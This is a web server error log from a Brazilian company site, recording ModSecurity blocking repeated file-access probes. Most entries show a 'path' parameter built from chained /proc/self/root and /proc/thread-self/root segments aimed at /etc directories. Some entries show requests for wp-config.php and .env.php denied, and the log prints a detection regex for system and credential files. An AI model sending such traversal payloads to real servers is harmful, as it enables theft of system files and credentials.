[Mon Mar 16 11:36:58.649871 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.241.46:52362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgViglT9VtDQc7bgUynqQAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:37:10.846980 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:42556] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVlv9ocpUE4ed4uDzogwAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:37:12.220953 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.241.46:50914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVmHjZBu2q05ozVU9PcgAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:37:16.662173 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:50930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVnNSswJuvopo3lOhYgAAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:37:20.097672 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.241.46:50938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVoHjZBu2q05ozVU9PdgAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:37:21.467267 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.241.46:52188] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVoXbQATo66fKoS7xHNQAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:37:29.944987 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.241.46:52192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVqRXjF1vJNtV6CWrwqwAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:37:36.610434 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.241.46:45580] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVsJqj1wV0Si-OkefljQAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:37:37.966788 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:45584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVsdSswJuvopo3lOhYiQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:37:42.579863 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:46878] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVtrysWC90G-1nBrA-lwAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:38:36.243112 2026] [access_compat:error] [pid 10709:tid 140411741927168] [client 185.177.72.22:55704] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-config.php
[Mon Mar 16 11:38:43.022248 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.241.46:46890] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgV8wlT9VtDQc7bgUyoMAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:38:48.300203 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.244.31:37942] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgV-BXjF1vJNtV6CWrwyAAAAdg"]
[Mon Mar 16 11:39:06.962950 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.241.46:41818] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWCo6lpbStxTqkSktmUAAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:39:09.322929 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.241.46:49244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWDXjZBu2q05ozVU9PwQAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:39:17.772708 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.241.46:49258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWFQlT9VtDQc7bgUyoOQAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:39:19.519779 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.241.46:52204] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWF3bQATo66fKoS7xHXAAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:39:22.255634 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.241.46:52216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWGhXjF1vJNtV6CWrw1AAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:39:38.864596 2026] [access_compat:error] [pid 10709:tid 140411632822016] [client 185.177.72.22:57090] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.php
[Mon Mar 16 11:39:54.329598 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.241.46:52218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWOpqj1wV0Si-Okefl3gAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:40:22.878813 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.241.46:46948] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWVnjZBu2q05ozVU9QGAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:40:24.241079 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:40162] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWWAlT9VtDQc7bgUyoXAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:41:09.929545 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:40176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWhXjZBu2q05ozVU9QXgAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:41:20.169832 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.228.16:34870] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgWkJqj1wV0Si-OkefmMwAAAA4"]
[Mon Mar 16 11:41:20.894982 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:59904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWkNSswJuvopo3lOhYyQAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:42:08.615759 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:46414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWwLysWC90G-1nBrA_AgAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
